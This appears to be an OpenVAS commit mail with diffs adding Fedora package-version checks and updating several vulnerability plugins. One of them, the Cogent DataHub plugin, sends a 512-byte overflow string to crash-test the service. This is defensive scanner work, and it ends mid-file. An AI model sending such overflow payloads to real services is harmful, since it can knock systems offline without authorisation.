[Openvas-commits] r11702 - in trunk/openvas-plugins: . scripts
scm-commit@wald.intevation.org
scm-commit at wald.intevation.org
Tue Sep 27 17:30:02 CEST 2011
Author: veerendragg
Date: 2011-09-27 17:29:53 +0200 (Tue, 27 Sep 2011)
New Revision: 11702
Added:
trunk/openvas-plugins/scripts/gb_fedora_2011_11196_foomatic_fc15.nasl
trunk/openvas-plugins/scripts/gb_fedora_2011_11205_foomatic_fc14.nasl
trunk/openvas-plugins/scripts/gb_fedora_2011_12145_qt_fc14.nasl
trunk/openvas-plugins/scripts/gb_fedora_2011_12300_nss_fc14.nasl
trunk/openvas-plugins/scripts/gb_fedora_2011_12580_quassel_fc14.nasl
trunk/openvas-plugins/scripts/gb_fedora_2011_12614_quassel_fc15.nasl
trunk/openvas-plugins/scripts/gb_fedora_2011_12616_rsyslog_fc15.nasl
trunk/openvas-plugins/scripts/gb_fedora_2011_12687_cherokee_fc14.nasl
trunk/openvas-plugins/scripts/gb_fedora_2011_12698_cherokee_fc15.nasl
trunk/openvas-plugins/scripts/gb_fedora_2011_3627_openldap_fc14.nasl
trunk/openvas-plugins/scripts/gb_fedora_2011_9820_libsoup_fc14.nasl
trunk/openvas-plugins/scripts/secpod_bloggeruniverse_sql_injection_vuln.nasl
trunk/openvas-plugins/scripts/secpod_icewarp_mail_server_xml_inj_n_info_disc_vuln.nasl
trunk/openvas-plugins/scripts/secpod_tooltalk_rpc_database_server_mult_vuln.nasl
Modified:
trunk/openvas-plugins/ChangeLog
trunk/openvas-plugins/scripts/gb_cogent_datahub_unicode_bof_vuln.nasl
trunk/openvas-plugins/scripts/gb_merak_mail_server_detect.nasl
trunk/openvas-plugins/scripts/secpod_metaserver_rt_multiple_dos_vuln.nasl
Log:
Added new plugins. Updated to detect latest version. Added application confirmation and Updated code completely as exploit was not working properly. Added new LSC plugins.
Modified: trunk/openvas-plugins/ChangeLog
===================================================================
--- trunk/openvas-plugins/ChangeLog 2011-09-27 13:50:49 UTC (rev 11701)
+++ trunk/openvas-plugins/ChangeLog 2011-09-27 15:29:53 UTC (rev 11702)
@@ -1,3 +1,31 @@
+2011-09-27 Veerendra G.G <veerendragg at secpod.com>
+
+ * scripts/secpod_bloggeruniverse_sql_injection_vuln.nasl,
+ scripts/secpod_tooltalk_rpc_database_server_mult_vuln.nasl,
+ scripts/secpod_icewarp_mail_server_xml_inj_n_info_disc_vuln.nasl:
+ Added new plugins.
+
+ * scripts/gb_merak_mail_server_detect.nasl:
+ Updated to detect latest version.
+
+ * scripts/gb_cogent_datahub_unicode_bof_vuln.nasl,
+ scripts/secpod_metaserver_rt_multiple_dos_vuln.nasl:
+ Added application confirmation and Updated code completely as exploit
+ was not working properly.
+
+ * scripts/gb_fedora_2011_9820_libsoup_fc14.nasl,
+ scripts/gb_fedora_2011_12698_cherokee_fc15.nasl,
+ scripts/gb_fedora_2011_3627_openldap_fc14.nasl,
+ scripts/gb_fedora_2011_12687_cherokee_fc14.nasl,
+ scripts/gb_fedora_2011_12145_qt_fc14.nasl,
+ scripts/gb_fedora_2011_11196_foomatic_fc15.nasl,
+ scripts/gb_fedora_2011_12614_quassel_fc15.nasl,
+ scripts/gb_fedora_2011_12616_rsyslog_fc15.nasl,
+ scripts/gb_fedora_2011_12580_quassel_fc14.nasl,
+ scripts/gb_fedora_2011_12300_nss_fc14.nasl,
+ scripts/gb_fedora_2011_11205_foomatic_fc14.nasl:
+ Added new LSC plugins.
+
2011-09-27 Henri Doreau <henri.doreau at greenbone.net>
* scripts/secpod_ms_win_media_player_detect_900173.nasl: Don't
@@ -44,7 +72,7 @@
* scripts/gb_openssl_detect_lin.nasl: Updated regexp to produce a
valid CPE (avoid suffix letter duplication).
-2011-09-22 Veerendra G.G <veerendragg at secpod.com>,
+2011-09-22 Veerendra G.G <veerendragg at secpod.com>
* scripts/secpod_colasoft_capsa_snmp_dos_vuln.nasl,
scripts/secpod_google_chrome_mult_vuln_sep11_lin.nasl,
Modified: trunk/openvas-plugins/scripts/gb_cogent_datahub_unicode_bof_vuln.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_cogent_datahub_unicode_bof_vuln.nasl 2011-09-27 13:50:49 UTC (rev 11701)
+++ trunk/openvas-plugins/scripts/gb_cogent_datahub_unicode_bof_vuln.nasl 2011-09-27 15:29:53 UTC (rev 11702)
@@ -86,6 +86,16 @@
exit(0);
}
+## Send normal request
+req = string('(domain "openvas-test")', raw_string(0x0a));
+send(socket:soc, data:req);
+res = recv(socket:soc, length:1024);
+
+## Confirm Application
+if('success "domain" "openvas-test"' >!< res){
+ exit(0);
+}
+
## Construct Attack Request
attack = crap(data: "a", length:512);
req = string('(domain "', attack, '")', raw_string(0x0a),
@@ -96,7 +106,7 @@
## Sending Attack
send(socket:soc, data:req);
-send(socket:soc, data:req);
+res = recv(socket:soc, length:1024);
close(soc);
sleep(5);
Added: trunk/openvas-plugins/scripts/gb_fedora_2011_11196_foomatic_fc15.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_fedora_2011_11196_foomatic_fc15.nasl 2011-09-27 13:50:49 UTC (rev 11701)
+++ trunk/openvas-plugins/scripts/gb_fedora_2011_11196_foomatic_fc15.nasl 2011-09-27 15:29:53 UTC (rev 11702)
@@ -0,0 +1,92 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+#
+# Fedora Update for foomatic FEDORA-2011-11196
+#
+# Authors:
+# System Generated Check
+#
+# Copyright:
+# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if(description)
+{
+ script_id(863536);
+ script_version("$Revision$: 1.0");
+ script_tag(name:"cvss_base", value:"6.8");
+ script_tag(name:"risk_factor", value:"High");
+ script_xref(name: "FEDORA", value: "2011-11196");
+ script_cve_id("CVE-2011-2924", "CVE-2011-2697", "CVE-2011-2923");
+ script_name("Fedora Update for foomatic FEDORA-2011-11196");
+ desc = "
+
+ Vulnerability Insight:
+ Foomatic is a comprehensive, spooler-independent database of printers,
+ printer drivers, and driver descriptions. This package contains
+ utilities to generate driver description files and printer queues for
+ CUPS, LPD, LPRng, and PDQ using the database (packaged separately).
+ There is also the possibility to read the PJL options out of PJL-capable
+ laser printers and take them into account at the driver description
+ file generation.
+
+ There are spooler-independent command line interfaces to manipulate
+ queues (foomatic-configure) and to print files/manipulate jobs
+ (foomatic printjob).
+ The site http://www.linuxprinting.org/
+
+
+ Affected Software/OS:
+ foomatic on Fedora 15
+
+ Fix: Please Install the Updated Packages.
+
+ References:
+ http://lists.fedoraproject.org/pipermail/package-announce/2011-September/066208.html
+
+ ";
+
+ script_description(desc);
+ script_summary("Check for the Version of foomatic");
+ script_category(ACT_GATHER_INFO);
+ script_copyright("Copyright (c) 2011 Greenbone Networks GmbH");
+ script_family("Fedora Local Security Checks");
+ script_dependencies("gather-package-list.nasl");
+ script_require_keys("ssh/login/release");
+ exit(0);
+}
+
+
+include("pkg-lib-rpm.inc");
+include("revisions-lib.inc");
+
+release = get_kb_item("ssh/login/release");
+
+if(release == NULL){
+ exit(0);
+}
+
+if(release == "FC15")
+{
+
+ if(isrpmvuln(pkg:"foomatic", rpm:"foomatic~4.0.8~3.fc15", rls:"FC15"))
+ {
+ security_hole(0);
+ exit(0);
+ }
+
+ exit(0);
+}
\ No newline at end of file
Added: trunk/openvas-plugins/scripts/gb_fedora_2011_11205_foomatic_fc14.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_fedora_2011_11205_foomatic_fc14.nasl 2011-09-27 13:50:49 UTC (rev 11701)
+++ trunk/openvas-plugins/scripts/gb_fedora_2011_11205_foomatic_fc14.nasl 2011-09-27 15:29:53 UTC (rev 11702)
@@ -0,0 +1,93 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+#
+# Fedora Update for foomatic FEDORA-2011-11205
+#
+# Authors:
+# System Generated Check
+#
+# Copyright:
+# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if(description)
+{
+ script_id(863540);
+ script_version("$Revision$: 1.0");
+ script_tag(name:"cvss_base", value:"6.8");
+ script_tag(name:"risk_factor", value:"High");
+ script_xref(name: "FEDORA", value: "2011-11205");
+ script_cve_id("CVE-2011-2924", "CVE-2011-2697", "CVE-2011-2923");
+ script_name("Fedora Update for foomatic FEDORA-2011-11205");
+ desc = "
+
+ Vulnerability Insight:
+ Foomatic is a comprehensive, spooler-independent database of printers,
+ printer drivers, and driver descriptions. This package contains
+ utilities to generate driver description files and printer queues for
+ CUPS, LPD, LPRng, and PDQ using the database (packaged separately).
+ There is also the possibility to read the PJL options out of PJL-capable
+ laser printers and take them into account at the driver description
+ file generation.
+
+ There are spooler-independent command line interfaces to manipulate
+ queues (foomatic-configure) and to print files/manipulate jobs
+ (foomatic printjob).
+
+ The site http://www.linuxprinting.org/
+
+
+ Affected Software/OS:
+ foomatic on Fedora 14
+
+ Fix: Please Install the Updated Packages.
+
+ References:
+ http://lists.fedoraproject.org/pipermail/package-announce/2011-September/066225.html
+
+ ";
+
+ script_description(desc);
+ script_summary("Check for the Version of foomatic");
+ script_category(ACT_GATHER_INFO);
+ script_copyright("Copyright (c) 2011 Greenbone Networks GmbH");
+ script_family("Fedora Local Security Checks");
+ script_dependencies("gather-package-list.nasl");
+ script_require_keys("ssh/login/release");
+ exit(0);
+}
+
+
+include("pkg-lib-rpm.inc");
+include("revisions-lib.inc");
+
+release = get_kb_item("ssh/login/release");
+
+if(release == NULL){
+ exit(0);
+}
+
+if(release == "FC14")
+{
+
+ if(isrpmvuln(pkg:"foomatic", rpm:"foomatic~4.0.8~3.fc14", rls:"FC14"))
+ {
+ security_hole(0);
+ exit(0);
+ }
+
+ exit(0);
+}
\ No newline at end of file
Added: trunk/openvas-plugins/scripts/gb_fedora_2011_12145_qt_fc14.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_fedora_2011_12145_qt_fc14.nasl 2011-09-27 13:50:49 UTC (rev 11701)
+++ trunk/openvas-plugins/scripts/gb_fedora_2011_12145_qt_fc14.nasl 2011-09-27 15:29:53 UTC (rev 11702)
@@ -0,0 +1,83 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+#
+# Fedora Update for qt FEDORA-2011-12145
+#
+# Authors:
+# System Generated Check
+#
+# Copyright:
+# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if(description)
+{
+ script_id(863543);
+ script_version("$Revision$: 1.0");
+ script_tag(name:"cvss_base", value:"9.3");
+ script_tag(name:"risk_factor", value:"Critical");
+ script_xref(name: "FEDORA", value: "2011-12145");
+ script_cve_id("CVE-2010-1822", "CVE-2011-3194");
+ script_name("Fedora Update for qt FEDORA-2011-12145");
+ desc = "
+
+ Vulnerability Insight:
+ Qt is a software toolkit for developing applications.
+
+ This package contains base tools, like string, xml, and network
+ handling.
+
+ Affected Software/OS:
+ qt on Fedora 14
+
+ Fix: Please Install the Updated Packages.
+
+ References:
+ http://lists.fedoraproject.org/pipermail/package-announce/2011-September/066209.html
+
+ ";
+
+ script_description(desc);
+ script_summary("Check for the Version of qt");
+ script_category(ACT_GATHER_INFO);
+ script_copyright("Copyright (c) 2011 Greenbone Networks GmbH");
+ script_family("Fedora Local Security Checks");
+ script_dependencies("gather-package-list.nasl");
+ script_require_keys("ssh/login/release");
+ exit(0);
+}
+
+
+include("pkg-lib-rpm.inc");
+include("revisions-lib.inc");
+
+release = get_kb_item("ssh/login/release");
+
+if(release == NULL){
+ exit(0);
+}
+
+if(release == "FC14")
+{
+
+ if(isrpmvuln(pkg:"qt", rpm:"qt~4.7.4~2.fc14", rls:"FC14"))
+ {
+ security_hole(0);
+ exit(0);
+ }
+
+ exit(0);
+}
\ No newline at end of file
Added: trunk/openvas-plugins/scripts/gb_fedora_2011_12300_nss_fc14.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_fedora_2011_12300_nss_fc14.nasl 2011-09-27 13:50:49 UTC (rev 11701)
+++ trunk/openvas-plugins/scripts/gb_fedora_2011_12300_nss_fc14.nasl 2011-09-27 15:29:53 UTC (rev 11702)
@@ -0,0 +1,83 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+#
+# Fedora Update for nss FEDORA-2011-12300
+#
+# Authors:
+# System Generated Check
+#
+# Copyright:
+# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if(description)
+{
+ script_id(863544);
+ script_version("$Revision$: 1.0");
+ script_tag(name:"risk_factor", value:"High");
+ script_xref(name: "FEDORA", value: "2011-12300");
+ script_name("Fedora Update for nss FEDORA-2011-12300");
+ desc = "
+
+ Vulnerability Insight:
+ Network Security Services (NSS) is a set of libraries designed to
+ support cross-platform development of security-enabled client and
+ server applications. Applications built with NSS can support SSL v2
+ and v3, TLS, PKCS #5, PKCS #7, PKCS #11, PKCS #12, S/MIME, X.509
+ v3 certificates, and other security standards.
+
+
+ Affected Software/OS:
+ nss on Fedora 14
+
+ Fix: Please Install the Updated Packages.
+
+ References:
+ http://lists.fedoraproject.org/pipermail/package-announce/2011-September/066221.html
+
+ ";
+
+ script_description(desc);
+ script_summary("Check for the Version of nss");
+ script_category(ACT_GATHER_INFO);
+ script_copyright("Copyright (c) 2011 Greenbone Networks GmbH");
+ script_family("Fedora Local Security Checks");
+ script_dependencies("gather-package-list.nasl");
+ script_require_keys("ssh/login/release");
+ exit(0);
+}
+
+
+include("pkg-lib-rpm.inc");
+include("revisions-lib.inc");
+
+release = get_kb_item("ssh/login/release");
+
+if(release == NULL){
+ exit(0);
+}
+
+if(release == "FC14")
+{
+
+ if(isrpmvuln(pkg:"nss", rpm:"nss~3.12.10~4.fc14", rls:"FC14"))
+ {
+ security_hole(0);
+ exit(0);
+ }
+
+ exit(0);
+}
\ No newline at end of file
Added: trunk/openvas-plugins/scripts/gb_fedora_2011_12580_quassel_fc14.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_fedora_2011_12580_quassel_fc14.nasl 2011-09-27 13:50:49 UTC (rev 11701)
+++ trunk/openvas-plugins/scripts/gb_fedora_2011_12580_quassel_fc14.nasl 2011-09-27 15:29:53 UTC (rev 11702)
@@ -0,0 +1,84 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+#
+# Fedora Update for quassel FEDORA-2011-12580
+#
+# Authors:
+# System Generated Check
+#
+# Copyright:
+# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if(description)
+{
+ script_id(863539);
+ script_version("$Revision$: 1.0");
+ script_tag(name:"risk_factor", value:"High");
+ script_xref(name: "FEDORA", value: "2011-12580");
+ script_cve_id("CVE-2011-3354");
+ script_name("Fedora Update for quassel FEDORA-2011-12580");
+ desc = "
+
+ Vulnerability Insight:
+ Quassel IRC is a modern, distributed IRC client,
+ meaning that one (or multiple) client(s) can attach
+ to and detach from a central core --
+ much like the popular combination of screen and a
+ text-based IRC client such as WeeChat, but graphical
+
+
+ Affected Software/OS:
+ quassel on Fedora 14
+
+ Fix: Please Install the Updated Packages.
+
+ References:
+ http://lists.fedoraproject.org/pipermail/package-announce/2011-September/066250.html
+
+ ";
+
+ script_description(desc);
+ script_summary("Check for the Version of quassel");
+ script_category(ACT_GATHER_INFO);
+ script_copyright("Copyright (c) 2011 Greenbone Networks GmbH");
+ script_family("Fedora Local Security Checks");
+ script_dependencies("gather-package-list.nasl");
+ script_require_keys("ssh/login/release");
+ exit(0);
+}
+
+
+include("pkg-lib-rpm.inc");
+include("revisions-lib.inc");
+
+release = get_kb_item("ssh/login/release");
+
+if(release == NULL){
+ exit(0);
+}
+
+if(release == "FC14")
+{
+
+ if(isrpmvuln(pkg:"quassel", rpm:"quassel~0.7.3~1.fc14", rls:"FC14"))
+ {
+ security_hole(0);
+ exit(0);
+ }
+
+ exit(0);
+}
\ No newline at end of file
Added: trunk/openvas-plugins/scripts/gb_fedora_2011_12614_quassel_fc15.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_fedora_2011_12614_quassel_fc15.nasl 2011-09-27 13:50:49 UTC (rev 11701)
+++ trunk/openvas-plugins/scripts/gb_fedora_2011_12614_quassel_fc15.nasl 2011-09-27 15:29:53 UTC (rev 11702)
@@ -0,0 +1,84 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+#
+# Fedora Update for quassel FEDORA-2011-12614
+#
+# Authors:
+# System Generated Check
+#
+# Copyright:
+# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if(description)
+{
+ script_id(863545);
+ script_version("$Revision$: 1.0");
+ script_tag(name:"risk_factor", value:"High");
+ script_xref(name: "FEDORA", value: "2011-12614");
+ script_cve_id("CVE-2011-3354");
+ script_name("Fedora Update for quassel FEDORA-2011-12614");
+ desc = "
+
+ Vulnerability Insight:
+ Quassel IRC is a modern, distributed IRC client,
+ meaning that one (or multiple) client(s) can attach
+ to and detach from a central core --
+ much like the popular combination of screen and a
+ text-based IRC client such as WeeChat, but graphical
+
+
+ Affected Software/OS:
+ quassel on Fedora 15
+
+ Fix: Please Install the Updated Packages.
+
+ References:
+ http://lists.fedoraproject.org/pipermail/package-announce/2011-September/066265.html
+
+ ";
+
+ script_description(desc);
+ script_summary("Check for the Version of quassel");
+ script_category(ACT_GATHER_INFO);
+ script_copyright("Copyright (c) 2011 Greenbone Networks GmbH");
+ script_family("Fedora Local Security Checks");
+ script_dependencies("gather-package-list.nasl");
+ script_require_keys("ssh/login/release");
+ exit(0);
+}
+
+
+include("pkg-lib-rpm.inc");
+include("revisions-lib.inc");
+
+release = get_kb_item("ssh/login/release");
+
+if(release == NULL){
+ exit(0);
+}
+
+if(release == "FC15")
+{
+
+ if(isrpmvuln(pkg:"quassel", rpm:"quassel~0.7.3~1.fc15", rls:"FC15"))
+ {
+ security_hole(0);
+ exit(0);
+ }
+
+ exit(0);
+}
\ No newline at end of file
Added: trunk/openvas-plugins/scripts/gb_fedora_2011_12616_rsyslog_fc15.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_fedora_2011_12616_rsyslog_fc15.nasl 2011-09-27 13:50:49 UTC (rev 11701)
+++ trunk/openvas-plugins/scripts/gb_fedora_2011_12616_rsyslog_fc15.nasl 2011-09-27 15:29:53 UTC (rev 11702)
@@ -0,0 +1,86 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+#
+# Fedora Update for rsyslog FEDORA-2011-12616
+#
+# Authors:
+# System Generated Check
+#
+# Copyright:
+# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if(description)
+{
+ script_id(863537);
+ script_version("$Revision$: 1.0");
+ script_tag(name:"cvss_base", value:"5.0");
+ script_tag(name:"risk_factor", value:"Medium");
+ script_xref(name: "FEDORA", value: "2011-12616");
+ script_cve_id("CVE-2011-3200");
+ script_name("Fedora Update for rsyslog FEDORA-2011-12616");
+ desc = "
+
+ Vulnerability Insight:
+ Rsyslog is an enhanced, multi-threaded syslog daemon. It supports MySQL,
+ syslog/TCP, RFC 3195, permitted sender lists, filtering on any message part,
+ and fine grain output format control. It is compatible with stock sysklogd
+ and can be used as a drop-in replacement. Rsyslog is simple to set up, with
+ advanced features suitable for enterprise-class, encryption-protected syslog
+ relay chains.
+
+
+ Affected Software/OS:
+ rsyslog on Fedora 15
+
+ Fix: Please Install the Updated Packages.
+
+ References:
+ http://lists.fedoraproject.org/pipermail/package-announce/2011-September/066271.html
+
+ ";
+
+ script_description(desc);
+ script_summary("Check for the Version of rsyslog");
+ script_category(ACT_GATHER_INFO);
+ script_copyright("Copyright (c) 2011 Greenbone Networks GmbH");
+ script_family("Fedora Local Security Checks");
+ script_dependencies("gather-package-list.nasl");
+ script_require_keys("ssh/login/release");
+ exit(0);
+}
+
+
+include("pkg-lib-rpm.inc");
+include("revisions-lib.inc");
+
+release = get_kb_item("ssh/login/release");
+
+if(release == NULL){
+ exit(0);
+}
+
+if(release == "FC15")
+{
+
+ if(isrpmvuln(pkg:"rsyslog", rpm:"rsyslog~5.8.5~1.fc15", rls:"FC15"))
+ {
+ security_hole(0);
+ exit(0);
+ }
+
+ exit(0);
+}
\ No newline at end of file
Added: trunk/openvas-plugins/scripts/gb_fedora_2011_12687_cherokee_fc14.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_fedora_2011_12687_cherokee_fc14.nasl 2011-09-27 13:50:49 UTC (rev 11701)
+++ trunk/openvas-plugins/scripts/gb_fedora_2011_12687_cherokee_fc14.nasl 2011-09-27 15:29:53 UTC (rev 11702)
@@ -0,0 +1,83 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+#
+# Fedora Update for cherokee FEDORA-2011-12687
+#
+# Authors:
+# System Generated Check
+#
+# Copyright:
+# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if(description)
+{
+ script_id(863541);
+ script_version("$Revision$: 1.0");
+ script_tag(name:"risk_factor", value:"High");
+ script_xref(name: "FEDORA", value: "2011-12687");
+ script_cve_id("CVE-2011-2190", "CVE-2011-2191");
+ script_name("Fedora Update for cherokee FEDORA-2011-12687");
+ desc = "
+
+ Vulnerability Insight:
+ Cherokee is a very fast, flexible and easy to configure Web Server. It supports
+ the widespread technologies nowadays: FastCGI, SCGI, PHP, CGI, TLS and SSL
+ encrypted connections, Virtual hosts, Authentication, on the fly encoding,
+ Apache compatible log files, and much more.
+
+
+ Affected Software/OS:
+ cherokee on Fedora 14
+
+ Fix: Please Install the Updated Packages.
+
+ References:
+ http://lists.fedoraproject.org/pipermail/package-announce/2011-September/066257.html
+
+ ";
+
+ script_description(desc);
+ script_summary("Check for the Version of cherokee");
+ script_category(ACT_GATHER_INFO);
+ script_copyright("Copyright (c) 2011 Greenbone Networks GmbH");
+ script_family("Fedora Local Security Checks");
+ script_dependencies("gather-package-list.nasl");
+ script_require_keys("ssh/login/release");
+ exit(0);
+}
+
+
+include("pkg-lib-rpm.inc");
+include("revisions-lib.inc");
+
+release = get_kb_item("ssh/login/release");
+
+if(release == NULL){
+ exit(0);
+}
+
+if(release == "FC14")
+{
+
+ if(isrpmvuln(pkg:"cherokee", rpm:"cherokee~1.2.99~1.fc14", rls:"FC14"))
+ {
+ security_hole(0);
+ exit(0);
+ }
+
+ exit(0);
+}
\ No newline at end of file
Added: trunk/openvas-plugins/scripts/gb_fedora_2011_12698_cherokee_fc15.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_fedora_2011_12698_cherokee_fc15.nasl 2011-09-27 13:50:49 UTC (rev 11701)
+++ trunk/openvas-plugins/scripts/gb_fedora_2011_12698_cherokee_fc15.nasl 2011-09-27 15:29:53 UTC (rev 11702)
@@ -0,0 +1,83 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+#
+# Fedora Update for cherokee FEDORA-2011-12698
+#
+# Authors:
+# System Generated Check
+#
+# Copyright:
+# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if(description)
+{
+ script_id(863538);
+ script_version("$Revision$: 1.0");
+ script_tag(name:"risk_factor", value:"High");
+ script_xref(name: "FEDORA", value: "2011-12698");
+ script_cve_id("CVE-2011-2190", "CVE-2011-2191");
+ script_name("Fedora Update for cherokee FEDORA-2011-12698");
+ desc = "
+
+ Vulnerability Insight:
+ Cherokee is a very fast, flexible and easy to configure Web Server. It supports
+ the widespread technologies nowadays: FastCGI, SCGI, PHP, CGI, TLS and SSL
+ encrypted connections, Virtual hosts, Authentication, on the fly encoding,
+ Apache compatible log files, and much more.
+
+
+ Affected Software/OS:
+ cherokee on Fedora 15
+
+ Fix: Please Install the Updated Packages.
+
+ References:
+ http://lists.fedoraproject.org/pipermail/package-announce/2011-September/066222.html
+
+ ";
+
+ script_description(desc);
+ script_summary("Check for the Version of cherokee");
+ script_category(ACT_GATHER_INFO);
+ script_copyright("Copyright (c) 2011 Greenbone Networks GmbH");
+ script_family("Fedora Local Security Checks");
+ script_dependencies("gather-package-list.nasl");
+ script_require_keys("ssh/login/release");
+ exit(0);
+}
+
+
+include("pkg-lib-rpm.inc");
+include("revisions-lib.inc");
+
+release = get_kb_item("ssh/login/release");
+
+if(release == NULL){
+ exit(0);
+}
+
+if(release == "FC15")
+{
+
+ if(isrpmvuln(pkg:"cherokee", rpm:"cherokee~1.2.99~1.fc15", rls:"FC15"))
+ {
+ security_hole(0);
+ exit(0);
+ }
+
+ exit(0);
+}
\ No newline at end of file
Added: trunk/openvas-plugins/scripts/gb_fedora_2011_3627_openldap_fc14.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_fedora_2011_3627_openldap_fc14.nasl 2011-09-27 13:50:49 UTC (rev 11701)
+++ trunk/openvas-plugins/scripts/gb_fedora_2011_3627_openldap_fc14.nasl 2011-09-27 15:29:53 UTC (rev 11702)
@@ -0,0 +1,87 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+#
+# Fedora Update for openldap FEDORA-2011-3627
+#
+# Authors:
+# System Generated Check
+#
+# Copyright:
+# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
